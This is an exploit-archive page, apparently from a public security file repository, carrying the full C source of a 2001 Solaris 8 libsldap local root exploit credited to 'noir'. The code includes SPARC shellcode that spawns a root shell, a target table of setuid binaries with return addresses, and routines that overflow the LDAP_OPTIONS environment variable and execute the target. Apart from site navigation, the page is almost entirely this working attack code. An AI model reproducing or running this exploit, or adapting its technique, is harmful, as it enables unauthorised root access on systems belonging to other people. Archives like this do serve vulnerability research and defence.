libsldap-exp.c

libsldap-exp.c: Posted Jul 12, 2001; Authored by noir; Solaris 8 libsldap local root exploit. Tested on an Ultra10 and an Enterprise 3500 with success.; tags | exploit, local, root; systems | solaris; SHA-256 | 703e2effcab17ca46f0f0820fae8e927c45ac8cfb996d67be8fc666421a7a8f2; Download | Favorite | View

libsldap-exp.c

/** !!!PRIVATE!!! 
 ** noir@gsu.linux.org.tr
 ** libsldap.so.1 $LDAP_OPTIONS enviroment variable overflow exploit;
 ** 
 **/
  
#include <stdio.h>

#define ADJUST      1


/* anathema@hack.co.za
** Solaris/SPARC shellcode
** setreuid(0, 0); setregid(0, 0); execve("/bin/sh", args, 0);
*/

char shellcode[] =
"\x90\x1a\x40\x09\x92\x1a\x40\x09\x82\x10\x20\xca\x91\xd0\x20\x08"
"\x90\x1a\x40\x09\x92\x1a\x40\x09\x82\x10\x20\xcb\x91\xd0\x20\x08"
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08";

struct type {
char *string;
char *path;
long retaddr;
};

struct type target[] = 
      {
        { "0, /usr/bin/passwd Solaris8, Sparc64", "/usr/bin/passwd", 0xffbefe98 }
,
        { "1, /usr/bin/nispasswd Solaris8, Sparc64", "/usr/bin/nispasswd", 0xffbe
fe98 },
        { "2, /usr/bin/yppasswd Solaris8, Sparc64", "/usr/bin/yppasswd", 0xffbefe
98 },
        { "3, /usr/bin/chkey Solaris8, Sparc64 ", "/usr/bin/chkey", 0xffbefea8 },
        { "4, /usr/lib/sendmail Solaris8, Sparc64", "/usr/lib/sendmail", 0xffbefe
b8 },
        { NULL, NULL, 0 } 
      };

int i;
unsigned long ret_adr;
char ldap[4000];
char egg[400];
char *envs[] = { ldap, egg, NULL };

main(int argc, char *argv[])
{

      if(!argv[1])
      {
              fprintf(stderr, "libsldap.so.1 $LDAP_OPTIONS enviroment variable \
buffer overflow\nExploit code: noir@gsu.linux.org.tr\nBug discovery: sway@hack.co
.za\n\nUsage: %s target#\n\n", argv[0]);
      for(i = 0; target[i].string != NULL; i++)
      fprintf(stderr,"target#: %s\n", target[i].string);
      exit(0); 
      }

  ret_adr = target[atoi(argv[1])].retaddr;
 
  memset(egg, 0x00, sizeof egg);
  for(i = 0 ; i < 400 - strlen(shellcode) ; i +=4)
  *(long *)&egg[i] =  0xa61cc013; 
  for (i= 0 ; i < strlen(shellcode); i++) 
     egg[200+i]=shellcode[i];
  
 for ( i = 0; i <  ADJUST; i++) ldap[i]=0x58;
 for (i = ADJUST; i < 4000; i+=4)
    {
      ldap[i+3]=ret_adr & 0xff;
      ldap[i+2]=(ret_adr >> 8 ) &0xff;
      ldap[i+1]=(ret_adr >> 16 ) &0xff;
      ldap[i+0]=(ret_adr >> 24 ) &0xff;
    }
memcpy(ldap, "LDAP_OPTIONS=", 13);
 
ldap[strlen(ldap) - 3] = 0x00; //ldap[3998] has to be NULL terminated

execle(target[atoi(argv[1])].path, "12341234", (char *)0, envs);

}

Top Authors In Last 30 Days

Red Hat 297 files
Ubuntu 60 files
Gentoo 32 files
Debian 31 files
LiquidWorm 10 files
Apple 9 files
malvuln 6 files
Adam Gowdiak 4 files
nu11secur1ty 4 files
Ahmet Umit Bayram 4 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,042)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,619)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,770)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,499)
UNIX (9,401)
UnixWare (187)
Windows (6,659)
Other

libsldap-exp.c

libsldap-exp.c

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

libsldap-exp.c

Share This

libsldap-exp.c

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems